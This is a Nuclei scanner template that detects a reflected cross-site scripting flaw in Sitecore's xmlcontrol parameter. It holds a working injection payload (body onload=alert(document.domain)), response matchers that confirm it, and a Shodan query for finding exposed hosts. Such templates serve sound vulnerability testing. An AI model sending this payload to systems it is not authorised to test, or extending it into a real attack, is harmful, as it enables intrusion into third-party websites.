id: sitecore-xml-xss

info:
  name: SiteCore XML Control Script Insertion
  author: DhiyaneshDK
  severity: medium
  description: |
    Sitecores “special way” of displaying XML Controls directly allows for a Cross Site Scripting Attack – more can be achieved with these XML Controls
  reference: |
    - https://vulners.com/securityvulns/SECURITYVULNS:DOC:30273
    - https://web.archive.org/web/20151016072340/http://www.securityfocus.com/archive/1/530901/100/0/threaded
  classification:
    cpe: cpe:2.3:a:sitecore:sitecore.net:*:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 1
    vendor: sitecore
    product: sitecore.net
    shodan-query: html:"Sitecore"
  tags: xss,sitecore,cms

http:
  - method: GET
    path:
      - "{{BaseURL}}/?xmlcontrol=body%20onload=alert(document.domain)"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<body onload=alert(document.domain) />"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100895294b2fd465f2dc8699e29bf285769a25c8b9c9aec212dcd8dc6077149ca75022100a002c19fecf230c2a68e867f7fb0ddfdfd63deae77556130903051f17483fc51:922c64590222798bb761d5b6d8e72950